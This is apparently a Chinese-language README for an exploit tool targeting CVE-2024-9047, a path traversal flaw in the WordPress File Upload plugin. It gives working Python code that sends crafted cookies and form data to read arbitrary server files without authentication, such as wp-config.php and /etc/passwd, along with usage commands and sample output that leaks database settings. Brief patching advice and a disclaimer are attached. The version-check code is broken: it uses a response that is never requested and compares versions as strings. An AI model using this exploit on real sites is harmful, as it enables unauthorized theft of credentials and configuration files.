WordPress File Upload 插件路径遍历漏洞利用工具 (CVE-2024-9047)
本项目提供了一个针对 WordPress File Upload 插件中严重安全漏洞的利用脚本。该漏洞(CVE-2024-9047)影响插件 4.24.11 及之前的所有版本,允许未经身份验证的攻击者通过路径遍历读取或删除服务器上的任意文件。
功能特性
- 无认证利用:利用过程无需任何 WordPress 账户凭据。
- 任意文件读取 :成功利用后,可读取服务器上任意可访问文件(如
wp-config.php)。 - 支持自定义路径:允许用户指定要读取的目标文件路径。
- 兼容 PHP 7.4 及更早环境:利用条件明确,针对特定 PHP 版本环境设计。
- 命令行友好:提供简洁的参数接口,便于集成到自动化测试流程中。
安装指南
系统要求
- Python 3.6 或更高版本
requests库
安装步骤
-
克隆或下载本项目代码至本地:
bashgit clone https://github.com/your-repo/CVE-2024-9047-Exploit.git cd CVE-2024-9047-Exploit -
安装 Python 依赖(如果尚未安装
requests):bashpip install requests
使用说明
基础用法
bash
python CVE-2024-9047.py --url <目标WordPress站点URL> [--command <目标文件路径>]
--url, -u:必选参数,目标 WordPress 站点的根 URL(例如http://example.com/wordpress)。--command, -c:可选参数,要读取的文件路径(相对于服务器文件系统根目录)。默认路径为/../../../../../opt/lampp/htdocs/wordpress/wp-config.php。
典型使用场景
场景一:快速检测漏洞并读取默认配置文件
bash
python CVE-2024-9047.py -u http://192.168.1.100/wordpress
工具将自动检测插件版本,若版本 ≤ 4.24.11 且 PHP 环境符合要求,则尝试读取默认的 wp-config.php 文件。
场景二:指定读取其他敏感文件
bash
python CVE-2024-9047.py -u http://example.com --command /../../../../../etc/passwd
执行输出示例
php
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
...
工作流程说明
- 漏洞利用 :向
/wp-content/plugins/wp-file-upload/wfu_file_downloader.php发送 POST 请求,携带恶意构造的 Cookie 和表单数据,利用路径遍历读取目标文件。 - 结果输出:若攻击成功,则在控制台打印文件内容;否则显示失败状态码。
核心代码
1. 版本检测模块
python
def check_version(url):
try:
if response.status_code == 200 and "Stable tag" in response.text:
for line in response.text.splitlines():
if "Stable tag" in line:
version = line.split(":")[1].strip()
print(f"Detected version: {version}")
if version <= "4.24.11":
print("The site is vulnerable!")
return True
else:
print("The site is not vulnerable.")
return False
else:
print("Unable to detect the plugin version.")
return False
except requests.RequestException as e:
print(f"Error checking version: {e}")
return False
2. 核心利用模块
python
def exploit(url, command):
try:
exploit_url = f"{url}/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
cookies = {
"wp_wpfileupload_testupload": "Nxploited",
"wfu_storage_file123": command,
"wfu_download_ticket_ticket123": "9876543210987",
"wfu_ABSPATH": "/",
}
data = {
"file": "file123",
"ticket": "ticket123",
"handler": "dboption",
"session_legacy": "1",
"dboption_base": "cookies",
"dboption_useold": "0",
"wfu_cookie": "wp_wpfileupload_testupload",
}
response = requests.post(exploit_url, cookies=cookies, data=data, timeout=10)
if response.status_code == 200:
print("Exploit successful! Response:")
print(response.text)
else:
print(f"Exploit failed. Response code: {response.status_code}")
except requests.RequestException as e:
print(f"Error during exploitation: {e}")
3. 主控制流程
python
def main():
parser = argparse.ArgumentParser(description="The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.")
parser.add_argument("--url", "-u", required=True, help="Target URL (e.g., http://example.com)")
parser.add_argument("--command", "-c", default="/../../../../../opt/lampp/htdocs/wordpress/wp-config.php", help="File path to read")
args = parser.parse_args()
target_url = args.url.rstrip("/")
command = args.command
if check_version(target_url):
exploit(target_url, command)
漏洞修复建议
- 立即将 WordPress File Upload 插件更新至最新版本。
- 升级 PHP 环境至 7.4 以上官方支持的版本。
- 严格限制 Web 服务器文件系统权限,避免敏感文件可被 Web 用户读取。
- 部署 Web 应用防火墙(WAF),拦截包含路径遍历特征的恶意请求。
免责声明
本工具及文档仅限用于安全研究、教育及授权的渗透测试。未经明确授权使用本工具攻击任何系统均属非法行为,使用者需自行承担一切法律责任。项目作者及贡献者对任何滥用行为不承担责任。 6HFtX5dABrKlqXeO5PUv/y6n7EBe6h2V2n05Vq1LwOqLqjbNI15A04sn614rpN95